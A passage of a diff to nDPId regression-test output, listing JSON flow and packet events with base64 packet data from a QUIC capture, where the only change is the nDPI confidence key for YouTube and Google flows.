NpJ2L59DkZaHZMZObQn4ik6O5C5VTnjBEObmR92eddNMuyKx5Kcg3EUAmOCeW6r2JGIl\/IhqsZitb1a2D0s80k4oX7Mvtlc4SQUaT7Qoy9cxZgVr3MS2h5r3nBhDjmOzclfK29evsEafcbJ8vHLvuDQLmwUbuWeYZPoiyIhQ9vr3rKz\/vd4UPl9YGc+ZFcosYc4+tF2ZvXLoV44zl5Hn+JUXSAMG8rfoE5RFiZCNdNSnotUGTuB8Lo8zqSeIICZx9qwBhwg0RBlSWK21bfhv0V6bO9uXd+SDA46Wuo9rvFwnraBKcacSoVBqqZ6NGGOXQX3CZ0UnZskQ2Xh9lq7c+9mbhD+uHkgeQ59u9+pCOoymabTpJz40KiLhh8cpE9UupFG3Btt\/mF\/tKjiDmpak0XaH5p715g4CskmYYeD92tSYiV2pxtPeSRFzREp31JbFciPWTWGHAynBoYesEZ31n6hzAN8xZIjFGAvCt9mogpjeOLZJ7T6QB+DXmTonvgfoavnlxnuqRqgiv2cdSaHzS1VthMln+XrEc6vIeLHjdmGTvxC4AfsHPWXQIScQ1dgnB39QlH9QGb+UXoJzINdUC7cxDDD1xWXlxqErv9pLj\/8syL\/kpqf0cAEb9f64EjRsyus6nZBGadcNgi1Md7ZoW1HGHML8j\/VyYIyJ1h7a+uvD3tW2ObzdNNh76C4O7RQWUO8ZVim2RcdZDeVvKTfU9dvyIagWxbYngJIGWUFxc+bA6nkUtX80ozt8+iMKvMyzsIr5C1WAgFhm\/JX2pUDX72XRGljQ99hW8WgvHx1zqZrH1LJ+aVfz7ij\/XG14HFhuepiATRHhb90pWV4gDy4BiWtZbCYyogbxOy35IER+o2RQvYWxiFGjGpj26HCJi40rj7HUSLn3oSMIhCgp0XQZUgssWXFY06WovWc+\/OK\/KLsjtKK"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433567521,"flow_last_seen":1621433567521,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433567521,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60936,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
+00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433567521,"flow_last_seen":1621433567521,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433567521,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60936,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433588411,"flow_last_seen":1621433588411,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433588411,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"22.12.150.194","src_port":59965,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1621433588411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433588411,"pkt":"AAAAAAAAAAEAz315CABFAAVi2sJAAH4Rh2SokEAFFgyWwuo9AbsFTrBryP8AAB0INSLhPL22UxQAAEU0dnb6uZhq1t6Zw3kr2pvHyfNWBxJD9W9s2zTRbPt+j3sYHVqGaibagTvObqxr8L7RMTtZH2xjRCWpCspX2XXuq+FXnTIfCwzq0R8bYQN7af9gvVLHPCvoe4LlWn1tEH6m0BTvrXq32km0YOpGp8mBDhiXp58UFczWic\/LDA0x6fF2n4YNtLE4Z2lMWFYhTTmuDLcKfFKATGaEQDjMewCgDLW4FqXB4m54SdcTcA\/dFOpbB1LCJ0YhH7hBJsrsRX7AF75ed76PrLag927ZRPEw3QiemYlDHW\/GgtF2bnMq6BMjp43+PZDDTs8Lw6sSJLk5j+j7binjYxfhzKvS9t5LIcp5cq8WQfdQfqbOCH+EpKFBTJXUATHM0GqFbPOFEWoTNdoLFZJCt0RlhQ2aFEhPRfofdgGmwmNcj6SQWX34PWjMe+xGvvQbWJbXfEiSpzsQw4qDOngUbAppNhq8yhTP7TLB+dKj0\/0j7CCnhGjf5VTlM4l8pSQLDnxJSczvPia0OmU+mYdzwvo0EOBr8AklCW7iLYW8dS2cmM0rlDa0ecqvTJ1VYOrB1S75Bz\/6V6+Hd7atab6h1vwSF2pFzXYcnqRiAinW\/VuSyg8KFFRr4Ybp5EzzwavSR2SInrndIzHlQgZhYkQhMHquBj5pApzCV3CuafdgWqruaCZexHIxHUdqmNN3yoqhpORch4AucgZXsQNNzu61Oune7H9O4MZHSTbLB19LCWWax1HzoFFeIyd+5XmDm8mqPBGBox1uxXAnJKM6+GXHpB2V+FVVww180yqLX4GanOJnfIFeIsn4XBJnYIAP18i9WhsbmRQWzl2XXYGFoRgkXkK1O+vGgPHV0EwDCUVaRhM2Rp+mvnnekeQws42lHMDRRxro+Eu9Ix0dsSJSRu5aFrroBpy3BPqsFCWb6M1EO0ZkiSuyMzMhMajOdUGCUna3gRiqvWtnMAbujUIPEq4PxN703lFKCAwIzIQNpwUh8mhLfFhAoyZhTjLup4KwhbKLFvYtKH0KHuLzpWQoBg9RYsqdtULI2+oQT2xHT99uhQc+dCK2nB0\/AJUbz91vXqq4Z+yTLK3qj+zNjQD0SHuOj18j+U37Pv7n6hwnuYzJKut5HNbT2mS5c\/00J82pn1UFjkHTJlZViBRbamRBCYCrX8FlJMJSeYHxtaGSD2LMbKIo8ecS2LrRVpGzwk0uo07Mlv9SeXRRtFhMhL8QJj7Ppv4crbwmWUJlFStoLO6iJRltLQK2Pl5JTkCISdw7ai8hmpPrQNR1gTuhnQ5\/GrIbz\/Hn59i+FyKiHMbjD3uzIGGIjeAdtBo03OGEL7XqBQA6NjJbG6W4THKFVaoUguo11P+g8z1hQF6OsY4EIS1M4hIImra0sUYy8Djc\/GGHsR0aEhjb1R4SiR+O9eiEtlxe1RT0g5rqIVSMhzdOU4wPWZDmrYaLl5hJ7phEqFGfgb6lrciOSZltZTNxTFq1zP4\/
a6FEXS7CWMcJ7gX6XCBKUdUEBZvF6VAhczRd86bNCG2G0yjbnySI5sJBiFiizMdJaTuboXWehh73WfYET2wCS2TQ5Sg3Fpi\/2mK9dgxsZor0IxYLcaR+pvqa9krSP1h\/W+5Yc0W0Il09dN1RybZXko2cOc4Lfkq3Q0OvSfG5Ch6ZniiOz6DPWiFOkZUz2wi4NdBirItgeWcbhu2bR2McE74iWO9Bzd+fUd3fpaJcOg9NgCJg79T+rFXw2qinlYZGKvc14iIcpyM1OlOVLiWgsVNddHQTUfoocRRE+Quu"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433588411,"flow_last_seen":1621433588411,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433588411,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"22.12.150.194","src_port":59965,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r1---sn-vh5ouxa-hju6.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433390651,"flow_last_seen":1621433390651,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433588411,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":58414,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433588411,"flow_last_seen":1621433588411,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433588411,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"22.12.150.194","src_port":59965,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r1---sn-vh5ouxa-hju6.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433390651,"flow_last_seen":1621433390651,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433588411,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":58414,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 
00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433648984,"flow_last_seen":1621433648984,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":64693,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02320{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1621433648984,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433648984,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+9FAAH4RFzaokEAFcfqJ8\/y1AbsFTvvUzP8AAB0IOGOQBfKCbj0ANwA\/voO+XXx9UNRzF\/PVLqUQmnVcfbJaFy+44m9Th\/J0D8vGDxgnE0b3my68fY4VhoH7ylldwCdE\/cIKBj8Q8msGVTF\/lZRPFcYyu4rQA4dMkmJLGh8h4hcVJXYlyXw0HxsVsRXBSCaH9pcz5MYJT0N8d\/QHoWIhJXtTq2A4a7329H7ZCy\/2hiheF\/XWiSc4pxmO9Ynh+JN2vvZnWdzm0q82\/5WdIhtH6DKNLW7\/XztT2A8BgoGu1165fwnnJttnCnp7MC7ceEZdqQcpJJ9S5BIzGJvI47OWUy\/O+A7cuxtRd80Baj5eUgykqLnUlMco5qWUXbGJ3qeG56zhiw2ILgjT7Bcuxpku4m9iswOoWD9e++B9OG3l4Nl0B6il9OgM9B6djMPEZaQ\/7P0eLCfrf8N1EK8IU+jTARRnjz11uoVbKvy1X354Ysm\/cfeR1fvYJ8g2GiyorZy5vRdiDqVcxw9hR+rNVIThkd9jHbU6NaUET2Zmcrhn0oU\/AQNeqrzoZrD0wkusdBqHE7Oy7ZP3iS2driLZ2Ic4Alz7LOyyp85qJ87V9cHDrhWW0V\/LheIEH23t7AEDMI2gPEDikZlOkiojcHtGj6V3+8VwA1VBAVbh6C2nQb7oWJn4psrNAUumMXN\/5bdg6Au5NE9nJBs2GYp2MzdKptvsKDmxm6J8MjGuWMQCrFOGnhGPYmsufDERoYla\/wIXOqNo8R\/FJFxzNp3PwXo7ZdrQ73XzNwHSr9ffXKXimX21O1SWpQHDR\/RbdX1vZUr3Lh7pfNbx6rH7OmcLXV99oY2AQ6e8oc11SSL+ZdlBq0HLriiqfnA7CcVCdmD6jw
EIQhCXdiNp2REzSEls5BEEPv8qRmwUQhOspQKayIHnIFw4XLXOua7WKV89\/vWuyJiksgmRtispubeUmTZoRJOF5\/jnh38nkBft2hu59mNNnWRGPvIy19bc0cxeWlZ4oo6nA9PJSZrQOdeW\/rD5ea8+DflUeQgYwFBI1S1PmVVqn6wiLMuaN3KohpzaQ3XgqrMrhPL05TT+tnokrX8jZ67X0mBu4DfS\/lggH6sBExWEAFyohWoqxhN0lUtYWZxgsnjiG+zXzgkP9ZtYeUvbNuzU6A5q3kVffXh28T+8yra1UAY4vmoeH\/QjLFtQVcEqveGRLBBG1l5o0fUNpUtnBrmmkZGfWY8JzXpI0KnKiHip4fBG0IQd+Q2bQOSO\/Udo4tFpVnmlDgeOeYmyrnrCqgC0cHv\/XR5E73gV1kjRoXxPvXxp\/pzGER9dhbxukOJbOd+VrD3OKeWSvoGbaNv3kYyanEP88AWW\/Bf2lDp7\/uZ7ngQLGve59K09TJ\/VxfxlMpRy29Y9kICc+sz8POsOp1zPo8X3lv4KDjtiGPrF4cogmdW+gz\/1Rx8RTv8nIGkGcj+GVFdIFzhqjZlaM+tlw+V5CFsnIZ58RzZR6PY1G0cLuEeCNRKseDLy2xunVcw0reIDCM\/BTmBGYOUScCRjBtpioVUlizTJN63ofb24jOlXZTsMyrT5MJJU6Slp9jrbFIgBY+6oR5a2h\/33BA9ep\/j6lsrwpd8UjkvRh76vxWRquNFGDZEA\/nnCBtRlZ9XDeCRoVW5+pY+5AmH2BOq5S+1kF52Jn+8edM7qfDOmmPZCwuDrVPEFHpbn96ryrPI4Qt9pbBcq2Z69uLwP\/ZTNn2joerZUg8Hl4cFuZ6ooBq6byB92bCiYOv3FnN\/Mx0lMa5Ean6QjpWh6xfjOoz2RFyP71l9S1BlUPEZhl3HfYvAeLR1G"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433648984,"flow_last_seen":1621433648984,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":64693,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
-00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} 
+00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433648984,"flow_last_seen":1621433648984,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":64693,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
+00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1621433848159,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433848159,"pkt":"AAAAAAAAAAEAguyCCABFAAViV7ZAAH4RzIyokEAFdZR1HukgAbsFTrrGzv8AAB0IZrtHVazP7GUANwCdzwl\/Ag4dMP\/532YmgteM9y4rfgnxKHdwAMQTxGHIHdDGRBEdHlnPsFRQLnkLCUyj+ZiMcQtE\/ZbnAwVVwgmAbJeZzFu0xe9BjJU+0q0ZPjc4pl\/q1xAOsn94uZ6J3jN9QX92abvAtxhYz8VeBqrOA607zbwY9GWSP6ok9Pja\/Fq8w8NDCZGf3qIL3rk\/wAzA3jEYpRRQWDHceKbIR88KOcO1FL8LDN9LJGuLhgF5FQs6DJLnrpIczBSYq4OBwz\/\/sKd1SAUQJMcAmfR\/jZPeYBnpsWTjRALFzwpImgbStENOm\/0p3NLhVUB6WCiKCvKKk9gT6\/d\/x10ux08ULPTBXIv\/k4Ll8l6sgA2ueorwPBTauFi21MhZZCtPcV3eJ6EUWMMMFrZfATCNoB+EVA44T4fDxdcOZEzFwjnKteEZmVkDbqqZ9qjV5YV3p\/6BGB2jz47XkvU4EacBYHhxZ2ZBLwV2tLuqe7+aE8IdEygSC4TSRNL49Ttq\/RQwV8aObYvXamg93UAuYbgkXDq6Cz0FVo2RyS4gV5roXuZXS44vxfS1oZOfTTNFzIHJUGwN9JEwtlJyaLE+zlmDRVeeKLag0ryJrnplqRANQHZqgBEbDtwGPSRu34eTOgLm4WHJcagJTF4Fz7xu6\/\/DDYatKPQYRG7oY7IYZQm7mhylJ7uBUzlcqBwaflcUNmXybTxJ+2WD0zZz6gCJLVhgwyhutJAlQanGkuwf3EdmqBx8ceqxoNJ7tZKAGK6ZLIa3G6I1xZC\/TaQ+1KZfZAfI4pB3hAXWDjm2gcWEJXPdl2HpQhbj4SN3C\/MogkQ6jmjo2la2vWjIQ2+qzYSkHj832CLT58yzA0tGXZvR5lpaU6hPOvYp9D+DMoC0H2it5Bi\/rirv+bbZpE7LzsCnG1SyGV0J0MpJPpexlnfbb0tXuruzppFFVv8XX\/\/AGNTxslc2JJDce0W3BO9U2F7QbGNMDxkz\/wBWOEZH8+aF8yWPCo26iB0IWKm64gR8orVp9wCN\/S\/ux5zHmhkRNoUehIoFt23QRRYl4mEM8Kb+yNY6ExrRhuVVLVK07imb+PWqHfegN+A6yiJIol96tI\/qRwPHidTWuw+BPOds5nSGwNNMYCpCNYS7znyftMnQYiHdYUMEr1nkXG0p+BTVDr6yzplTCLHGEroPKNnH8e3DVvViJ3UCgrkqYMJFZa415l4iDMaX1IPVcIVbn0GJt+fxcZSe\/4EBL\/Lglqu4lLqW8vfP3Ryp18CcBI5AUvjnbHT3H9GKw1At8VX0EmM6FNbrzmSDDHpjxJAjZFsnjcKA4s8cGEzjtd04U5Ov1l\/uV+TrsjbEVaYIN3cAlR8CmLid56lf832bUt\/rJVHoQNMALy35MqNi3UTMRHx2sOalpm1X2yqB6Qcr8RiPpnVvJ0XaoyVa69ClIE\/D0J\/eeWPqDxqyOq2dFObeT\/Q3Ey6oum6
f7LqZWXPfk\/Of0coJY79h0DaTGeZt8KNREQgsRBcylskDOu5tf2QjszGuOPnHGGIjoEkML3giU2HtWNdhUpR6kCeVzhBvo+CYlsFw0XUh5F8NiKLotZ\/peNJe9m5PV26VmA1CuJnJUZ+iTsXmSUkD0eRX0gnwfjJ6dq\/oMKsvWsVcGcwOkeW0MrEVdWGsBJjfzNjkVIa433oGL9UgwBMpD4PWzwUd+SNd+1vgvOeW4tFbxfn\/XBNWVoFAyPSzEwkXy++b+c1GHJidlATTQULFM1qwYz4DqrTvS\/tKosbIdtvCa5V\/Wk2K\/pjchLwN"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433588411,"flow_last_seen":1621433588411,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"22.12.150.194","src_port":59965,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433567521,"flow_last_seen":1621433567521,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 